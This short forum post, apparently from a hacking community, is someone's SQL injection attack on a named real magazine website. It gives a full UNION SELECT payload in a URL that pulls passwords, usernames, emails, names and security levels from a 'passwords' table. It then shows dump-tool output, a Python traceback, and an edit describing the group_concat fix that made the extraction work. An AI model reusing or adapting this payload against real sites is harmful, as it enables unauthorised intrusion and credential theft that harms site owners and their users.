It looks like you're new here. If you want to get involved, click one of these buttons!
http://www.connectionsmag.co.il/articlenav.php?id=1163+AND+1=2+UNION+SELECT+1,2,3,4,concat(upassword,0x7c,username,0x7c,emailaddress,0x7c,firstname,0x7c,lastname,0x7c,securitylevel),6,7+from+passwords+limit+0,1--
[+] Dumping data from database \"None\" Table \"passwords\"
[+] and Column(s) ['securitylevel', 'lastname', 'firstname']
Traceback (most recent call last):
File \"darkmysqliSH.py\", line 841, in <module>
match = match[0][2:].split(\"\x1e\")
IndexError: list index out of range
EDIT:
Nevermind, figured it out.
http://goo.gl/1l26h
group_concat (from here http://www.iexploit.org/community/showt ... +injection)) and 0x0A as newline character.